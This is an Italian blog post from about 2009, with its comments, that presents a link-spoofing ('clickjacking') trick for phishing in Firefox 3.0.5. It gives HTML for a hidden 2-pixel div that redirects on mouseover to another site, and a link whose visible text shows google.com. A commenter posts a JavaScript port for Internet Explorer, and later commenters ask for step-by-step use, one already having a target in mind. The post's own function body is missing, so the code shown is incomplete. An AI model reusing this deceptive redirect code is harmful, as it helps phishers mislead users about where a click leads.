Oggi ho proprio voglia di ... Clickjacking

Il phishing è uno dei fenomeni (di sicurezza) di massa che attualmente affligge il mondo dell'utenza internet, lo diceva due anni fa gartner ed oggi siamo proprio nella "mainstream adoption":
London, UK, September 18, 2006 — Gartner, Inc. today advised businesses to plan for five increasingly prevalent cyberthreats that have the potential to inflict significant damage on organisations during the next two years. They are; targeted threats, identity theft, spyware, social engineering and viruses.

via New Gartner Hype Cycle Highlights Five High Impact IT Security Risks.

[caption id="" align="aligncenter" width="699" caption="tratto da http://en.wikipedia.org/wiki/Phishing "]tratto da http://en.wikipedia.org/wiki/Phishing[/caption]

(Maggiori report dall'APWG)



Ma come perpetuare un attacco di questo tipo?

Visto che oggi più che mai mi sento per la full disclosure, non vi farò attendere troppo

Se fossi un attaccante e volessi fare del phishing il primo problema che mi si pone è quello di non mettere in allerta l'attaccato. Purtroppo, o per fortuna, i vecchi metodi di link manipulation fanno scattare tutti gli strumenti di alerting che abbiamo più o meno installato sulla macchina... allora? Come fare?

ClickJacking: ovvero come offuscare la barra di un browser (nell'esempio firefox) per nascondere il sito target

Una div :

onmouseover="document.location='http://freeuser.org';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px">



una semplice function JS:

ed un onclick:
<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a>

... garantiscono il risultato :)

Pagina Html di Test



Provare per credere, buona serata

PS: La "vulnerabilità" è data per FireFox 3.0.5 ... io uso la 3.1beta2 tirate voi le vostre conclusioni!

5 commenti:

  1. maxmanzo28 gennaio 2009 alle ore 21:09

    Testato personalmente!!!
    Io ho in mente già dove provarlo... ma la mia è solo un'idea :D

    RispondiElimina
  2. Dario Santarelli28 gennaio 2009 alle ore 21:49

    Affascinante bastardata! :D

    Mi permetto di postare il porting su IE:


    function updatebox()
    {
    var mouseX=window.event.clientX;
    var mouseY=window.event.clientY;
    document.getElementById('mydiv').style.left=mouseX-2; // Occhio: non -1
    document.getElementById('mydiv').style.top=mouseY-2; // Occhio: non -1
    }


    Il div 'myDiv' può essere anche 1x1px

    RispondiElimina
  3. adres8 maggio 2011 alle ore 21:32

    Come si usa ? mi spiegate passo passo ?.. sono un po' ignorante in materia

    RispondiElimina
  4. Andrea L.15 giugno 2011 alle ore 00:12

    Ciao Adres, che vuoi sapere di preciso?

    RispondiElimina
  5. Luois18 ottobre 2011 alle ore 18:09

    Vorrei sapere come si attua questo attacco, cioè step by step.
    Cosa devo utilizzare e come?

    Grazie Mille.

    RispondiElimina